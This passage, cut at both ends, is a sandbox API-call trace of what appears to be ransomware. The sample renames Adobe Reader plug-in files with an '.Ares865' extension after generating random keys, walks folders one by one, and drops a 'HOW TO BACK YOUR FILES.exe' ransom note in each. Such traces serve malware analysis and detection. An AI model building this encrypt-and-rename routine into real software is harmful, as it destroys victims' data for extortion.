10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ptb.ares865"), dwFlags=0x1) returned 1 [0173.528] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.PTB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.ptb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.528] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.528] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.529] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.529] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.531] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.531] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.532] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.532] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.SUO" | out: lpString1="WindowsMedia.SUO") returned="WindowsMedia.SUO" [0173.532] lstrlenW (lpString="WindowsMedia.SUO") returned 16 [0173.532] lstrlenW (lpString="Ares865") returned 7 [0173.532] lstrcmpiW (lpString1="dia.SUO", lpString2="Ares865") returned 1 [0173.532] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SUO.Ares865") returned 96 [0173.533] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.suo"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.suo.ares865"), dwFlags=0x1) returned 1 [0173.534] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SUO.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.suo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.534] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.535] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.535] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.535] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.537] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.538] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.538] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.539] lstrcpyW (in: lpString1=0x2cce490, lpString2="WindowsMedia.SVE" | out: lpString1="WindowsMedia.SVE") returned="WindowsMedia.SVE" [0173.539] lstrlenW (lpString="WindowsMedia.SVE") returned 16 [0173.539] lstrlenW (lpString="Ares865") returned 7 [0173.539] lstrcmpiW (lpString1="dia.SVE", lpString2="Ares865") returned 1 [0173.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SVE.Ares865") returned 96 [0173.539] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.sve"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.sve.ares865"), dwFlags=0x1) returned 1 [0173.541] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.SVE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.sve.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.541] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.541] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.542] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.542] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.544] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.545] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.545] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.546] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations" [0173.546] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations" [0173.546] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0173.546] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.547] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.548] GetLastError () returned 0x0 [0173.548] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.548] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a05ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a05ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.548] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.548] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.549] lstrcpyW (in: lpString1=0x2cce48a, lpString2="Stamps" | out: lpString1="Stamps") returned="Stamps" [0173.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0173.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31afc8 [0173.549] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0173.549] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a05ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a05ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stamps", cAlternateFileName="")) returned 0 [0173.549] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0173.549] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79d0 [0173.549] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps" [0173.549] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps" [0173.549] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0173.549] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.550] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.551] GetLastError () returned 0x0 [0173.551] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.551] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a05ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a05ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.551] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.551] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.551] lstrcpyW (in: lpString1=0x2cce498, lpString2="CAT" | out: lpString1="CAT") returned="CAT" [0173.551] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0173.551] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x320fc8 [0173.551] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0173.551] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cff820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cff820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CHS", cAlternateFileName="")) returned 1 [0173.552] lstrcmpiW (lpString1="CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.552] lstrcmpiW (lpString1="CHS", lpString2="aoldtz.exe") returned 1 [0173.552] lstrcpyW (in: lpString1=0x2cce498, lpString2="CHS" | out: lpString1="CHS") returned="CHS" [0173.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0173.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321070 [0173.552] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0173.552] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff28600, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cd96c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cd96c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CHT", cAlternateFileName="")) returned 1 [0173.552] lstrcmpiW (lpString1="CHT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.552] lstrcmpiW (lpString1="CHT", lpString2="aoldtz.exe") returned 1 [0173.552] lstrcpyW (in: lpString1=0x2cce498, lpString2="CHT" | out: lpString1="CHT") returned="CHT" [0173.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0173.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321118 [0173.552] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0173.552] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cd96c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cd96c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CZE", cAlternateFileName="")) returned 1 [0173.552] lstrcmpiW (lpString1="CZE", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.552] lstrcmpiW (lpString1="CZE", lpString2="aoldtz.exe") returned 1 [0173.552] lstrcpyW (in: lpString1=0x2cce498, lpString2="CZE" | out: lpString1="CZE") returned="CZE" [0173.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0173.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x3211c0 [0173.553] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0173.553] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cb3560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cb3560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DAN", cAlternateFileName="")) returned 1 [0173.553] lstrcmpiW (lpString1="DAN", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.553] lstrcmpiW (lpString1="DAN", lpString2="aoldtz.exe") returned 1 [0173.553] lstrcpyW (in: lpString1=0x2cce498, lpString2="DAN" | out: lpString1="DAN") returned="DAN" [0173.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0173.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321268 [0173.553] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0173.553] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54cb3560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54cb3560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DEU", cAlternateFileName="")) returned 1 [0173.553] lstrcmpiW (lpString1="DEU", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.553] lstrcmpiW (lpString1="DEU", lpString2="aoldtz.exe") returned 1 [0173.553] lstrcpyW (in: lpString1=0x2cce498, lpString2="DEU" | out: lpString1="DEU") returned="DEU" [0173.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0173.553] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321310 [0173.553] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0173.553] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c8d400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c8d400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENU", cAlternateFileName="")) returned 1 [0173.553] lstrcmpiW (lpString1="ENU", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.553] lstrcmpiW (lpString1="ENU", lpString2="aoldtz.exe") returned 1 [0173.554] lstrcpyW (in: lpString1=0x2cce498, lpString2="ENU" | out: lpString1="ENU") returned="ENU" [0173.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0173.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x3213b8 [0173.554] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0173.554] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff4e760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c672a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c672a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESP", cAlternateFileName="")) returned 1 [0173.554] lstrcmpiW (lpString1="ESP", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.554] lstrcmpiW (lpString1="ESP", lpString2="aoldtz.exe") returned 1 [0173.554] lstrcpyW (in: lpString1=0x2cce498, lpString2="ESP" | out: lpString1="ESP") returned="ESP" [0173.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0173.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321460 [0173.554] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0173.554] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81e8c820, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c672a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c672a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EUQ", cAlternateFileName="")) returned 1 [0173.554] lstrcmpiW (lpString1="EUQ", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.554] lstrcmpiW (lpString1="EUQ", lpString2="aoldtz.exe") returned 1 [0173.554] lstrcpyW (in: lpString1=0x2cce498, lpString2="EUQ" | out: lpString1="EUQ") returned="EUQ" [0173.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0173.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321508 [0173.554] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0173.554] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c672a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c672a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FRA", cAlternateFileName="")) returned 1 [0173.555] lstrcmpiW (lpString1="FRA", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.555] lstrcmpiW (lpString1="FRA", lpString2="aoldtz.exe") returned 1 [0173.555] lstrcpyW (in: lpString1=0x2cce498, lpString2="FRA" | out: lpString1="FRA") returned="FRA" [0173.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0173.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x3215b0 [0173.555] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0173.555] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54a05ca0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x54a05ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0173.555] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0173.555] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c41140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c41140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HRV", cAlternateFileName="")) returned 1 [0173.555] lstrcmpiW (lpString1="HRV", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.555] lstrcmpiW (lpString1="HRV", lpString2="aoldtz.exe") returned 1 [0173.555] lstrcpyW (in: lpString1=0x2cce498, lpString2="HRV" | out: lpString1="HRV") returned="HRV" [0173.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0173.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x321658 [0173.555] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0173.555] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806e4d80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54c41140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54c41140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HUN", cAlternateFileName="")) returned 1 [0173.555] lstrcmpiW (lpString1="HUN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0173.555] lstrcmpiW (lpString1="HUN", lpString2="aoldtz.exe") returned 1 [0173.556] lstrcpyW (in: lpString1=0x2cce498, lpString2="HUN" | out: lpString1="HUN") returned="HUN" [0173.556] RtlAllocateHeap (HeapHandle=0x2b0000, 